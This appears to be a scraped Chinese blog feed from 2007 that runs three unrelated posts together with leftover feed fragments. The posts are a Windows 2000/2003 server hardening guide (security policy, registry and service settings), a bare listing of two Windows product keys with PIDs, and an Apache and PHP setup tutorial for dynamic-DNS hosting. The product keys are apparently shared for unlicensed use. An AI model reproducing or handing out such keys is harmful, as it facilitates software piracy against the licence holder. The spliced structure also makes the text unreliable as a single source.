对服务器通讯使用数字签名（始终）    启用
对服务器通讯进行数字签名 (如果可能)    启用
禁用按 CTRL+ALT+DEL 进行登录的设置    禁用
登录屏幕上不要显示上次登录的用户名    启用
LAN Manager 身份验证级别    仅发送 NTLMv2 响应，拒绝 LM & NTLM
用户尝试登录时消息文字    
用户尝试登录时消息标题    
缓冲保存的以前登录次数（在域控制器不可用的情况下）    0 次登录
防止计算机账户密码的系统维护    禁用
防止用户安装打印机驱动程序    启用
在密码到期前提示用户更改密码    14 天
故障恢复控制台：允许自动管理登录    禁用
故障恢复控制台：允许对驱动器和文件夹进行软盘复制和访问    禁用
重命名系统管理员账户    未定义
重命名来宾账户    未定义
只有本地登录的用户才能访问 CD-ROM    启用
只有本地登录的用户才能访问软盘    启用
安全通道：对安全通道数据进行数字加密或签名（始终）    启用
安全通道：对安全通道数据进行数字加密 （如果可能）    启用
安全通道：对安全通道数据进行数字签名（如果可能）    启用
安全通道: 需要强 (Windows 2000 Server 或以上版本) 会话密钥    启用
安全系统磁盘分区（只适于 RISC 操作平台）    未定义
发送未加密的密码以连接到第三方 SMB 服务器。    禁用
如果无法记录安全审计则立即关闭系统    启用（见第二条附注）
智能卡移除操作    锁定工作站
增强全局系统对象的默认权限（例如 Symbolic Links）    启用
未签名驱动程序的安装操作    禁止安装
未签名非驱动程序的安装操作    允许安装但发出警告
在上面的推荐配置中，下面几项由于直接影响了域中各服务器间通讯的方式，可能会对服务器性能有影响。
    对匿名连接的附加限制 
默认情况下，Windows 2000 Server 允许匿名用户执行某些活动，如枚举域账户和网络共享区的名称。这使得攻击者无需用一个用户账户进行身份验证就可以查看远程服务器上的这些账户和共享名。为 更好地保护匿名访问，可以配置“没有显式匿名权限就无法访问”。这样做的效果是将 Everyone（所有人）组从匿名用户令牌中删除。对服务器的任何匿名访问都将被禁止，而且对任何资源都将要求显式访问。
    LAN Manager 身份验证级别 
 Microsoft Windows 9x 和 Windows NT® 操作系统不能使用 Kerberos 进行身份验证，所以，在默认情况下，在 Windows 2000 域中它们使用 NTLM 协议进行网络身份验证。您可以通过使用 NTLMv2 对 Windows 9x 和 Windows NT 强制执行一个更安全的身份验证协议。对于登录过程，NTLMv2 引入了一个安全的通道来保护身份验证过程。
    在关机时清理虚拟内存页面交换文件 
实际内存中保存的重要信息可以周期性地转储到页面交换文件中。这有助于 Windows 2000 Server 处理多任务功能。如果启用此选项，Windows 2000 Server 将在关机时清理页面交换文件，将存储在那里的所有信息清除掉。根据页面交换文件的大小不同，系统可能需要几分钟的时间才能完全关闭。
    对客户端/服务器通讯使用数字签名 
在高度安全的网络中实现数字签名有助于防止客户机和服务器被模仿（即所谓“会话劫持”或“中间人”攻击）。服务器消息块 (SMB) 签名既可验证用户身份，又可验证托管数据的服务器的身份。如有任何一方不能通过身份验证，数据传输就不能进行。在实现了 SMB 后，为对服务器间的每一个数据包进行签名和验证，性能最多会降低 15%。

针对Server 2003的设置：
通过运行Secpol.msc > Security Settings > Local Policies进行设置
安全选项    设置
在用户密码过期前通知用户    7 天

4    注册表安全配置
4.1    注册表访问授权
对于Windows注册表的访问授权必须按下列的表格进行设置，“访问授权”栏里规定了对于普通用户（例如Everyone, Users, Authenticated Users或 other groups containing general users）所赋予的最大权利。

注册表资源名称    访问授权
HKCR or HKLM\Software\Classes\ 
保护对于文件扩展名链接和COM类注册信息的未授权修改    Read*
HKLM\System\CurrentControlSet\Control\SecurePipeServers
值: Winreg
限制远程注册表访问权限    Read*
HKLM\System\CurrentControlSet\Services\Eventlog\Security
保护安全日志保存目录和配置被未授权的进行浏览。
  普通用户没有相应权限。
HKLM\System\CurrentControlSet\Services\Eventlog\DNS
- 适用于MS DNS服务运行环境中
-保护DNS日志保存目录和配置被未授权的进行浏览    普通用户没有相应权限。
注释：对于‘Read‘的授权包括‘RX’(读取和执行)和‘List Folder Contents’(列出文件夹内容)。
4.2    禁止匿名访问注册表
只允许系统管理员拥有远程访问注册表的权限。
1. 添加如下注册表项：
项目    参数
Hive    HKEY_LOCAL_MACHINE \SYSTEM
Key    \CurrentControlSet\Control\SecurePipeServers
Value Name    \winreg

2. 选中“winreg”，点击“Security”选单，点击“Permission”，设置系统管理员Administrator拥有“Full Control”，确保没有其他用户或组包含在其中，点击“OK”。

4.3    针对网络攻击的安全考虑事项
有些拒绝服务攻击可能会给 Windows 2000 Server 服务器上的 TCP/IP 协议栈造成威胁。这些注册表设置有助于提高 Windows 2000 Server TCP/IP 协议栈抵御标准类型的拒绝服务网络攻击的能力。
下面的注册表项作为 HKLM\System\CurrentControlSet\Services\Tcpip|Parameters\ 的子项添加：
项    格式    值（十进制）
EnableICMPRedirect    DWORD    0
EnableSecurityFilters    DWORD    1
SynAttackProtect    DWORD    2
EnableDeadGWDetect    DWORD    0
EnablePMTUDiscovery    DWORD    0
KeepAliveTime    DWORD    300,000
DisableIPSourceRouting    DWORD    2
TcpMaxConnectResponseRetransmissions    DWORD    2
TcpMaxDataRetransmissions    DWORD    3
NoNameReleaseOnDemand    DWORD    1
PerformRouterDiscovery    DWORD    0
TCPMaxPortsExhausted    DWORD    5
4.4    禁用 8.3 格式文件名的自动生成
为与 16 位应用程序的向后兼容，Windows 2000 Server 支持 8.3 文件名格式。这意味着攻击者只需要 8 个字符即可引用可能有 20 个字符长的文件。如果您不再使用 16 位应用程序，则可以将此功能关闭。禁用 NTFS 分区上的短文件名生成还可以提高目录枚举性能。下面的注册表项作为 HKLM\System\CurrentControlSet\Control\FileSystem\ 的子项添加：
项    格式    值（十进制）
NtfsDisable8dot3NameCreation    DWORD    1
4.5    禁用 Lmhash 创建
Windows 2000 Server 服务器可以验证运行任何以前 Windows 版本的计算机的身份。然而，以前版本的 Windows 不使用 Kerberos 进行身份验证，所以 Windows 2000 Server 支持 Lan Manager (LM)、Windows NT (NTLM) 和 NTLM 版本 2 (NTLMv2)。相比之下，LM 散列运算的能力比 NTLM 弱，因而易在猛烈攻击下被攻破。如果您没有需要 LM 身份验证的客户机，则应禁用 LM 散列的存储。Windows 2000 Server Service Pack 2 以上提供了一个注册表设置以禁用 LM 散列的存储。
下面的注册表项作为 HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ 的一个子项添加：
项    格式    值（十进制）
NoLMHash    DWORD    1
4.6    配置 NTLMSSP 安全
NTLM 安全支持提供程序 (NTLMSSP) 允许您按应用程序指定服务器端网络连接的最低必需安全设置。下面的配置可以确保，如果使用了消息保密但未协商 128 位加密，则连接将失败。下面的注册表项作为 HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\ 的一个子项添加：
项    格式    值（十六进制）
NtlmMinServerSec    DWORD    0x20000000
4.7    禁用自动运行功能
一旦媒体插入一个驱动器，自动运行功能就开始从该驱动器读取数据。这样，程序的安装文件和音频媒体上的声音就可以立即启动。为防止可能有恶意的程序在媒体插入时就启动，组策略禁用了所有驱动器的自动运行功能。下面的注册表项作为 HKLM\SOFTWARE\  Microsoft\Windows\CurrentVersion\Policies\Explorer\的一个子项添加：
项    格式    值（十六进制）
NoDriveTypeAutoRun    DWORD    0xFF
4.8    附加的注册表安全配置
针对Windows 2000 Server and Server 2003安全设置，可是用注册表编辑器Registry Editor (Regedt32.exe)来实现如下设置
删除下列项（该值在Server 2003上不存在）
注册表项: HKLM\System\CurrentControlSet\Services\SNMP\Parameters\ValidCommunities\
项: public:REG_DWORD:0x4
功能：删除Public SNMP通信字段名（如不需要使用SNMP功能，否则建议保留）。

5    服务管理
5.1    成员服务器
Windows 2000 Server 首次安装时，创建默认服务并将其配置为在系统启动时运行。这些服务中有一些在许多环境中都不需要运行，再者，因为任何服务都是一个潜在的受攻击点，所以应禁用不必要的服务。
下面的配置是windows2000成员服务器加入windows2000域并提供基本管理服务所必需的服务，建议除这些服务以外，根据实际情况禁止其它服务。
服务    启动类型    包括在成员服务器基准策略中的理由
COM+ 事件服务    手动    允许组件服务的管理
DHCP 客户端    自动    更新动态 DNS 中的记录所需
分布式链接跟踪客户端    自动    用来维护 NTFS 卷上的链接
DNS 客户端    自动    允许解析 DNS 名称
事件日志    自动    允许在事件日志中查看事件日志消息
逻辑磁盘管理器    自动    需要它来确保动态磁盘信息保持最新
逻辑磁盘管理器管理服务    手动    需要它以执行磁盘管理
Netlogon    自动    加入域时所需
网络连接    手动    网络通讯所需
性能日志和警报    手动    收集计算机的性能数据，向日志中写入或触发警报
即插即用    自动    Windows 2000 Server 标识和使用系统硬件时所需
受保护的存储区    自动    需要用它保护敏感数据，如私钥
远程过程调用 (RPC)    自动    Windows 2000 Server 中的内部过程所需
远程注册服务    自动    hfnetchk 实用工具所需（参见附注）
安全账户管理器    自动    存储本地安全账户的账户信息
服务器    自动    hfnetchk 实用工具所需（参见附注）
系统事件通知    自动    在事件日志中记录条目所需
TCP/IP NetBIOS Helper 服务    自动    在组策略中进行软件分发所需（可用来分发修补程序）
Windows 管理规范驱动程序    手动    使用“性能日志和警报”实现性能警报时所需
Windows 时间服务    自动    需要它来保证 Kerberos 身份验证有一致的功能
工作站    自动    加入域时所需
除上述必须的服务以外，还有一些服务可能会在具体的环境中需要：
    SNMP 服务
在许多情况下，管理应用程序都需要在每个服务器上安装一个代理。一般地，这些代理将使用 SNMP 将警报消息发回到一个中央管理服务器。如果需要管理代理，那么有可能会需要启动 SNMP 服务。
    WMI 服务
为使用“计算机管理”来管理逻辑磁盘，您需要启用 WMI 服务。其他许多应用程序和工具也使用 WMI。
    信使服务和报警服务
尽管这两种服务并不是明确地彼此相互依赖，但它们往往一起完成发送管理警报的任务。信使服务将发送由报警服务触发的警报消息。如果使用“性能日志和警报”触发警报消息，就需要启用这些服务。]]> 2007-12-20 09:33:18 http://86wf.mytupa.com/blog/view.php?id=843ebc3ce8401a65626661a2b87d0233 DDQXW-THQ8M-79V6K-2YFGH-R793Q           PID: 76481-640-0174977-xxxxx
DP7CM-PD6MC-6BKXT-M8JJ6-RPXGJ             PID: 76481-640-1464517-xxxxx  ]]> 2007-12-07 14:54:49 http://86wf.mytupa.com/blog/view.php?id=2e844555f29833322748995bf163556e
这里讲的是IIS服务器，其实花生壳在Apache下也能正常使用，这一点我在以前的帖子中已经讲过，现在专门把Apache的配置作一详细说明：

首先：当然是下载Apache啦，Apache目前最新的Windows版本是1.3.2X,你可以到它的官方网站去下载最新版(http://www.apache.org)，Win2000 对应的下载文件是Win32版本，Win98和Winme对应的下载文件是R298orMe版本，注意别下载错了。如果你使用的是Win2000而下载了 Win98orMe的版本，嘿嘿，等着看那个黑黑的DOS窗口吧，此外，还要注意不要下载成UNIX或LINUX下的版本了，目前UNIX或LINUX下的最新版本是
1.2X,版本要较Windows下的高，这很容易区分出来的。

其次：脚本支持,我在这里向大家推荐PHP,原因很简单,PHP无论在功能上还是执行效率上都有不俗的表现,此外,学起来也很简单,大家可以到本论坛之 [网页开发]去留意一下我写的PHP教程连载，也可以自己买一本书对照着学，甚至你可以直接通过PHP的在线MANUAL学习……，如果你的E文水平足够好的话！
PHP下载地址:http://www.php.net/downloads.php
目前最新版本是4.1.0，功能已经超强，同样注意不要下载成了Linux或Unix下的版本，也不要下载成源代码

再次：现在才进入话题，等我喝一口水先
1.将PHP下载文件解压到C:/ProgramFiles/php下.关于php.ini的配置,请参考[网页开发]版的"如何在IIS中安装PHP" 一文,这里就不细说了,需要强调的是一定要把修改后的php.ini文件拷贝到系统的安装目录下，如d:\winnt或c:\windows (win9xorme)

2.下载下来的Apache最新版可能是以Msi 结尾的文件，在Win2000和Winme里边安装自然是没问题，不过对于偏爱Win98的同志来说就得去找中介了，找来找去，找到一个叫 InstMsi.exe（1.42M）的东东，该软件可以在微软的网站下载到，在国内很多软件下载网站也能找到，先安装InstMsi.exe,再安装Apache

一路点击［Next］->［IAcceptthetermsinthelicenseagreement］->［Next］->［Next］->
这时会弹出［ServerInformation］的配置窗口，

在NetworkDomain下边输入你的域名（当然是顶级域名啦，如果没有，瞎乱写一个也成，如boy.com），如果你在注册花生壳时注册了www.xxx(不要想歪了哦^Q^).com的使用权，并且修改了DNS服务器指向花生壳提供给你的服务器（主域名服务器(PrimaryDNS)： dns.faseng.com次域名服务器(SecondaryDNS)：ns.soonway.net），那么，在这里你可以填入xxx.com

在ServerName下边输www.xxx.com
在Administrator'sEmailaddress下边输入你的E-mail地址
在InstallApacheHTTPServerprogramsandshortcutsto:下边有两个选项
如果你不想每次开机都自动启动Apache服务器，你可以选择第二个，默认是安装为服务，即每次开机自动启动服务器，自己看着办好啦

之后涉及到选择安装路径什么的，都不用我多说，一直到安装结束

测试Apache是否安装成功：请先停止IIS或其他开了80端口的服务器。然后在在浏览器中输入127.0.0.1,你如果看到一个标题为406NotAcceptable的网页，内容是index.html.xx列表，并有简短说明的话，恭喜，你已经安装成功了。
当然，你总不能拿一个406NotAcceptable的网页的东西给人家看吧，所以，还需要修改一下Apache的配置文件，该文件位于Apache安装目录下的conf子目录里边，支系找一下你会发现一个叫httpd.conf的文件，后边还有一个httpd.default.conf的文件，后者是前者的备份文件，如果你修改了httpd.conf导致Apache服务器无法启动，并且你还不知道怎样恢复httpd.conf,你可以把httpd.default.conf复制一份为httpd.conf，然后重新启动服务器，你就会看到初始情况下的406NotAcceptable的网页了。

还是说如何修改httpd.conf吧，
对一般用户来说，需要修改的地方如下：
在大约268行左右找到Port，这是服务器开放的端口，默认是80，以便别人通www.xxx.com或aaa.xxx.com能访问你的服务器，如果你想同时使用IIS和Apache的话，你可以修改IIS中WEB服务器的端口或这里的端口，只要端口没有冲突，就都能访问，例如：把这里的80修改成8080，那么别人就需要在浏览器中输www.xxx.com:8080才能访问到你的WEB服务器。

接下来几行你会看到ServerAdmin，就是你刚才填写的服务器管理员地址，如果别人在访问你的网站时出错，则系统会生成一个页面提示访问者与你的E-mail联系。

再往下十几行有ServerName，这是服务器名称（域名，跟IIS中的主机头名功能差不多），如你没有申请国际域名，只在傲锐申请了一个二级域名，例如boy.vicp.net,那么这里你也可以输入boy.vicp.net

再往下DocumentRoot,这里设置网站的根目录,建议根目录设置在另外一个盘上,不然万一或者也许可能你的系统崩溃了,用GHOST等软件恢复时又搞忘了数据备份，就惨了！！！

再往下,有
<Directory/>
OptionsFollowSymLinks
AllowOverrideNone
</Directory>
几行,修改成
<Directory"C:/ProgramFiles/php">
OptionsNone
AllowOverrideNone
</Directory>
上边的C:/ProgramFiles/php是你下载的php4.x解压后的路径

再往下有
<Directory"C:/ProgramFiles/ApacheGroup/Apache/htdocs">
把这一行修改成
<Directory"你的网站根目录">
如：<Directory"D:/WWW">

继续向下,找到
<IfModulemod_dir.c>
DirectoryIndexindex.html
</IfModule>
几行,这里是用来设置网站的默认首页名称的,你可以再添加几个,如
<IfModulemod_dir.c>
DirectoryIndexindex.htmlindex.htminde.shtmlindex.shtmindex.phpindex.php3index.phtml
</IfModule>
是比较理想的


好了,现在一直转到文件末尾,在后边添加如下代码:
ScriptAlias/php/"C:/ProgramFiles/php"
AddTypeapplication/x-httpd-php4.php3.php.phtml
Actionapplication/x-httpd-php4/php/php.exe
其中,"C:/ProgramFiles/php"是PHP你解压后的路

保存httpd.conf,并通过[开始]->[设置]->[控制面板]->[管理工具]->[服务]里边重新启动Apache
也可在通过[开始]->[运行]->
输入netstopapache回车
再输入netstartapache来重新启动Apache，以使你刚才的修改生效。


************************以下内容仅供参考*****************************************
[坚决打击各种形式的广告行为]的设置：如果你申请了N个花生壳域名，如我申请了boy.vicp.netgirl.vicp.net
则也可以很方便地实现,详细方法见下
*********************************************************************************

在httpd.conf的文件末尾添加如下代码：
NameVirtualHost127.0.0.1
<VirtualHost127.0.0.1>
ServerAdminyouremail@youdomain.com
DocumentRootD:/WWW/boy
ServerNameboy.vicp.net
</VirtualHost>

<VirtualHost127.0.0.1>
ServerAdminyouremail@youdomain.com
DocumentRootD:/WWW/girl
ServerNamegirl.vicp.net
</VirtualHost>
(上边代码中的127.0.0.1也可以是你的真实IP，即通过合法渠道拥有的IP，不是上网的随机IP，切记。)

如此,你可以添加多个域名,只需要在文件的末尾增加

<VirtualHostIP地址>
ServerAdmin管理员E-mail
DocumentRoot子域名根目录
ServerName子域名名称
</VirtualHost>

几行代码即可。如果你注册了顶级域名，还可以通过这种方法自己配置属于自己的boy.domain.com或girl.domain.com......
注意：虚拟域名跟前边的主DocumentName不能相同，否则全都转到前边的根目录去了。

保存httpd.conf,并通过[开始]->[设置]->[控制面板]->[管理工具]->[服务]里边重新启动Apache
也可在通过[开始]->[运行]->
输入netstopapache回车
再输入netstartapache来重新启动Apache，以使你刚才的修改生效。

好了，拨号上网，运行花生壳吧，如果连接正常，别人在地址栏中输入http://boy.vicp.net/和http://girl.vicp.net就可以访问你的两个不同域名的网站了。]]> 2007-12-04 09:27:13